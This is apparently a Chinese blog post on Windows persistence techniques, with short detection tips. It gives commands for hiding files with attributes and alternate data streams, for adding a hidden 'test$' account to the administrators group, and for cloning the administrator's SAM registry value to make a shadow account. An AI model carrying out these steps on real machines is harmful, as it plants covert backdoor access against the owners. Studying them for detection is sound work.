权限维持--windows

隐藏文件

①文件属性隐藏

如何排查: 使用dir命令无法看到有特殊属性的文件需使用/a

②真隐藏

相当于给原本的文件增加系统文件属性、存档文件属性、只读文集属性、隐藏文件属性

如何排查: 取消受保护的操作系统文件

③利用ADS隐藏

使用数据流

echo "123">>tet.php:hidden.jpg::$DATA

此时该文件无法通过补全等常规手段查看

如何排查&清理: dir /r可查 或直接删除对应的显示文件,直接删除test.php即可

隐藏账号&克隆账号

net user test$ qaz123 /add

net localgroup administrators test$ /add

添加隐藏账户,并加入管理员组

检查方法:通过D盾查杀工具

如和创建影子账户,创建出的test用户可以已administrator账户的身份登陆

①创建一个账户名为test$

net user test$ mima /add

给sam表分配权限

注册表:REGEDIT 位置:HKEY_LOCAL_MACHINE\SAM\SAM

导出三个表

①administrator用户的值对应的表3.reg

②test$用户的用户表,1.reg

③test$用户值对应的表,2.reg

替换2.reg中的f值为3.reg

导入注册表,并删除test$账户 先删,后导

net user test$ /del

regedit /s 1.reg

regedit /s 2.reg

导入效果

  • 12
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值